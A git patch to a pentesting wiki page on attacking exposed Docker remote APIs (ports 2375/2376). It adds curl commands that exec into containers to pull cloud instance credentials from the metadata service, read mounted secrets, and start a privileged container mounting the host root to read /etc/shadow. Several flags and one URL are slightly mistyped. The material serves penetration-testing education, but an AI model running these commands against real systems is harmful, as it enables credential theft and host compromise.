From bfb72cbb4db2f6d13f4d07e5749deaa80d9fec42 Mon Sep 17 00:00:00 2001
From: CPol
Date: Thu, 31 Dec 2020 16:14:52 +0000
Subject: [PATCH] GitBook: [master] 2 pages modified

---
 SUMMARY.md                           |  2 +-
 pentesting/2375-pentesting-docker.md | 59 +++++++++++++++++++++++++---
 2 files changed, 54 insertions(+), 7 deletions(-)

diff --git a/SUMMARY.md b/SUMMARY.md
index 83e3f269..e2741ff3 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -262,7 +262,7 @@
 * [1883 - Pentesting MQTT \(Mosquitto\)](pentesting/1883-pentesting-mqtt-mosquitto.md)
 * [2049 - Pentesting NFS Service](pentesting/nfs-service-pentesting.md)
 * [2301,2381 - Pentesting Compaq/HP Insight Manager](pentesting/pentesting-compaq-hp-insight-manager.md)
-* [2375 Pentesting Docker](pentesting/2375-pentesting-docker.md)
+* [2375, 2376 Pentesting Docker](pentesting/2375-pentesting-docker.md)
 * [3260 - Pentesting ISCSI](pentesting/3260-pentesting-iscsi.md)
 * [3299 - Pentesting SAPRouter](pentesting/3299-pentesting-saprouter.md)
 * [3306 - Pentesting Mysql](pentesting/pentesting-mysql.md)
diff --git a/pentesting/2375-pentesting-docker.md b/pentesting/2375-pentesting-docker.md
index 000f6fde..1a128400 100644
--- a/pentesting/2375-pentesting-docker.md
+++ b/pentesting/2375-pentesting-docker.md
@@ -1,4 +1,4 @@
-# 2375 Pentesting Docker
+# 2375, 2376 Pentesting Docker
 
 ## Docker Basics
 
@@ -79,9 +79,7 @@ podman ls
 ```
 {% endhint %}
 
-## 2375 - Pentesting Docker API
-
-### Basic Information
+## Basic Information
 
 Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the host’s environment.
 
@@ -92,14 +90,63 @@ PORT STATE SERVICE
 2375/tcp open docker
 ```
 
-### Enumeration
+## Enumeration
+
+### Manual
+
+Note that in order to enumerate the docker API you can use the `docker` command or `curl` like in the following example:
+
+```bash
+curl -s http://open.docker.socket:2375/version | jq #Get version
+docker -H open.docker.socket:2375 version #Get version
+```
+
+If you can **contact the remote docker API with the `docker` command** you can **execute** any of the **docker** [**commands previously** commented](2375-pentesting-docker.md#basic-commands) to interest with the service.
+
+#### Curl
+
+Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but you can with curl no problem to hit the docker API.
+
+```bash
+#List containers
+curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
+#List processes inside a container
+curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
+#Set up and exec job to hit the metadata URL
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'
+#Get the output
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
+# list secrets (no secrets/swarm not set up)
+curl -s –insecure https://tlsopen.docker.socket:2376/secrets | jq
+#Check what is mounted
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
+#Get the output by starting the exec
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
+#Cat the mounted secret
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
+#List service (If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables)
+curl -s –insecure https://tls-opendocker.socket:2376/services | jq
+#Creating a container that has mounted the host file system and read /etc/shadow
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
+curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
+#Stop the container
+curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop
+#Delete stopped containers
+curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
+```
+
+If you want more information about this, more information is available where I copied the commands from: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
+
+### Automatic
 
 ```bash
 msf> use exploit/linux/http/docker_daemon_tcp
 nmap -sV --script "docker-*" -p
 ```
 
-### Compromising
+## Compromising
 
 In the following page you can find a way to **scape from a docker container**:
 